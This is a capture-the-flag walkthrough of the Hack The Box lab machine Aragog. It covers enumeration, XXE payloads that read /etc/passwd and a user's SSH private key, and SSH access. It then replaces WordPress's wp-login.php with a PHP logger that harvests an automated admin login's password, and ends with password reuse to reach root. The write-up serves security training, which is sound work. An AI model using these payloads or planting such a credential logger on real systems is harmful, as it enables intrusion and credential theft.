HTB-Aragog
2022-07-24 23:23:00 【H0ne】
Step 1: enumeration
└─# nmap -sV -O -F --version-light 10.10.10.78
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 08:23 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 08:23 (0:00:00 remaining)
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 08:23 (0:00:03 remaining)
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.10.78
Host is up (0.22s latency).
Not shown: 97 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/18%OT=21%CT=7%CU=40837%PV=Y%DS=2%DC=I%G=Y%TM=62D550C
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=105%GCD=1%ISR=103%TI=Z%CI=I%TS=A)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O
OS:3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11NW7%O6=M539ST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M539NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.81 seconds
Step 2: getting user access
Port 21 is FTP (vsftpd 3.0.3) and port 22 is SSH. Start with FTP: the server accepts an anonymous login, so list what is there and pull it down.
└─# ftp anonymous@10.10.10.78
Connected to 10.10.10.78.
220 (vsFTPd 3.0.3)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||42880|)
150 Here comes the directory listing.
-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
226 Directory send OK.
ftp> ls -a
229 Entering Extended Passive Mode (|||46951|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Dec 21 2017 .
drwxr-xr-x 2 ftp ftp 4096 Dec 21 2017 ..
-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
226 Directory send OK.
ftp> cat test.txt
?Invalid command.
ftp> get test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||45066|)
150 Opening BINARY mode data connection for test.txt (86 bytes).
100% |********************************| 86 2.15 MiB/s 00:00 ETA
226 Transfer complete.
86 bytes received in 00:00 (0.39 KiB/s)
Download it with get test.txt; its content is an XML fragment:
<details>
<subnet_mask>255.255.255.192</subnet_mask>
<test></test>
</details>
That is as far as FTP goes, so the next step is web content enumeration. The usual tools are dirbuster, gobuster, feroxbuster and so on; here feroxbuster is used, with .php as an extra extension.
# feroxbuster -u http://10.10.10.78/ -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher ver: 2.7.0
───────────────────────────┬──────────────────────
Target Url │ http://10.10.10.78/
Threads │ 50
Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.0
Config File │ /etc/feroxbuster/ferox-config.toml
Extensions │ [php]
HTTP methods │ [GET]
Recursion Depth │ 4
New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
Press [ENTER] to use the Scan Management Menu
──────────────────────────────────────────────────
(live progress output trimmed; the scan turns up hosts.php)

Visit http://10.10.10.78/hosts.php.
Intercept the request in Burp Suite, paste the XML from test.txt into the POST body and resend it.
The response comes back fine and looks like a subnet calculator, so the server is parsing the XML we supply. That means we control the document and can build an XXE payload: declare an external entity pointing at a local file and reference it where the value gets echoed.
<?xml version="1.0" ?>
<!DOCTYPE XXE [<!ENTITY test SYSTEM "file:///etc/passwd"> ]>
<details>
<subnet_mask>&test;</subnet_mask>
<test></test>
</details>

The response echoes the file back; the interesting entry is:
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
So the account with a home directory under /home is florian.
The user flag can be read the same way (file:///home/florian/user.txt).
Step 3: getting root
First grab florian's private SSH key with the same XXE;
it is stored in /home/florian/.ssh/id_rsa.
<?xml version="1.0" ?>
<!DOCTYPE XXE [<!ENTITY test SYSTEM "file:///home/florian/.ssh/id_rsa"> ]>
<details>
<subnet_mask>&test;</subnet_mask>
<test></test>
</details>

Copy the id_rsa contents into a local file and chmod 600 it (ssh refuses a key file that other users can read),
then log in as florian with the key:
└─# ssh -i id_rsa florian@10.10.10.78
Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3
florian@aragog:~$ cd /var/
florian@aragog:/var$ ls
backups crash lib lock mail opt snap tmp
cache ftp local log metrics run spool www
florian@aragog:/var$ cd www
florian@aragog:/var/www$ ls
html
florian@aragog:/var/www$ cd html
florian@aragog:/var/www/html$ ls
dev_wiki hosts.php index.html zz_backup
florian@aragog:/var/www/html$ cd dev_wiki/
florian@aragog:/var/www/html/dev_wiki$ ls
index.php wp-blog-header.php wp-includes wp-settings.php
license.txt wp-comments-post.php wp-links-opml.php wp-signup.php
readme.html wp-config.php wp-load.php wp-trackback.php
wp-activate.php wp-content wp-login.php xmlrpc.php
wp-admin wp-cron.php wp-mail.php
dev_wiki is a WordPress install.
Visiting http://10.10.10.78/dev_wiki/index.php renders badly because the site redirects to the hostname aragog,
which does not resolve from the attacking machine.
Map aragog to 10.10.10.78 in /etc/hosts
on the attacking machine:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# echo '10.10.10.78 aragog' >> /etc/hosts
Once the WordPress site renders normally, replace the contents of wp-login.php with a request logger. Something on the box posts a login to that page on its own (the User-Agent in the capture below gives it away), so whatever it sends, including the password, ends up in the dump file:
<?php
// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40
// Dumps the incoming request (method, URI, headers, raw body) to a file.
class DumpHTTPRequestToFile {
    public function execute($targetFile) {
        $data = sprintf(
            "%s %s %s\n\nHTTP headers:\n",
            $_SERVER['REQUEST_METHOD'],
            $_SERVER['REQUEST_URI'],
            $_SERVER['SERVER_PROTOCOL']
        );
        foreach ($this->getHeaderList() as $name => $value) {
            $data .= $name . ': ' . $value . "\n";
        }
        $data .= "\nRequest body:\n";
        // php://input is the raw POST body, so the form fields land here
        // URL-encoded, exactly as the client sent them.
        file_put_contents(
            $targetFile,
            $data . file_get_contents('php://input') . "\n"
        );
        echo("Done!\n\n");
    }

    private function getHeaderList() {
        $headerList = [];
        foreach ($_SERVER as $name => $value) {
            if (preg_match('/^HTTP_/',$name)) {
                // convert HTTP_HEADER_NAME to Header-Name
                $name = strtr(substr($name,5),'_',' ');
                $name = ucwords(strtolower($name));
                $name = strtr($name,' ','-');
                // add to list
                $headerList[$name] = $value;
            }
        }
        return $headerList;
    }
}

(new DumpHTTPRequestToFile)->execute('./dumprequest.txt');
Wait for dumprequest.txt to appear (the automated login comes around on its own schedule; each request overwrites the file, so read it as soon as it shows up):
florian@aragog:/var/www/html/dev_wiki$ cat dumprequest.txt
POST /dev_wiki/wp-login.php HTTP/1.1
HTTP headers:
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Cookie: wordpress_test_cookie=WP Cookie check
Request body:
pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit=Log+In&testcookie=1&log=Administrator&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F
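As an added example (written for this page, not code from the post), the following Python parses the file the logger above writes and decodes the WordPress login form from it. The dump layout (request line, blank line, "HTTP headers:" block, blank line, "Request body:" block) is exactly what the PHP snippet's sprintf/concatenation produces; SAMPLE_DUMP is rebuilt from the dump shown in the post, and the function names are this example's own.

```python
"""Added example, not code from the post: parse the file written by the
DumpHTTPRequestToFile snippet and decode the WordPress login form in it.
SAMPLE_DUMP is rebuilt from the dump shown in the post."""
from typing import Dict, Tuple
from urllib.parse import parse_qs

SAMPLE_DUMP = (
    "POST /dev_wiki/wp-login.php HTTP/1.1\n"
    "\n"
    "HTTP headers:\n"
    "Host: 127.0.0.1\n"
    "Connection: keep-alive\n"
    "Accept-Encoding: gzip, deflate\n"
    "Accept: */*\n"
    "User-Agent: python-requests/2.18.4\n"
    "Cookie: wordpress_test_cookie=WP Cookie check\n"
    "\n"
    "Request body:\n"
    "pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit=Log+In&testcookie=1"
    "&log=Administrator&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F\n"
)


def parse_dump(text: str) -> dict:
    """Split one dump into request line, headers and decoded form fields.
    parse_qs splits on '&' before percent-decoding, so an '&' that was sent
    as %26 (as inside this password) stays part of its value."""
    head, sep, body = text.partition("\nRequest body:\n")
    if not sep:
        raise ValueError("not a DumpHTTPRequestToFile dump")
    request_line, _, header_block = head.partition("\n\nHTTP headers:\n")
    method, target, proto = request_line.strip().split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_block.splitlines():
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip()] = value.strip()
    form = {k: v[0] for k, v in
            parse_qs(body.strip(), keep_blank_values=True).items()}
    return {"method": method, "target": target, "proto": proto,
            "headers": headers, "form": form}


def wp_credentials(dump: dict) -> Tuple[str, str]:
    """WordPress sends the username as 'log' and the password as 'pwd'."""
    return dump["form"]["log"], dump["form"]["pwd"]


def looks_automated(dump: dict) -> bool:
    """A scripted client (python-requests) talking to 127.0.0.1 is the tell
    that something on the box logs in on a schedule, which is what made
    planting the logger worthwhile in the first place."""
    ua = dump["headers"].get("User-Agent", "").lower()
    host = dump["headers"].get("Host", "")
    return ua.startswith("python-requests") and host.startswith("127.0.0.1")


if __name__ == "__main__":
    d = parse_dump(SAMPLE_DUMP)
    user, password = wp_credentials(d)
    print(f"{d['method']} {d['target']} from {d['headers'].get('User-Agent')}")
    print(f"user={user} password={password} automated={looks_automated(d)}")
```

Decoding with parse_qs rather than a bare unquote matters here: the password contains a percent-encoded ampersand, and unquoting the whole body first would split the value in the wrong place.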
pwd is URL-encoded; decoded it is !KRgYs(JFO!&MTr)lf. The Host header 127.0.0.1 and the python-requests User-Agent show this is a local script logging in automatically, not a browser.
The same password is reused for the root account, so escalate with su root and enter it,
then cat /root/root.txt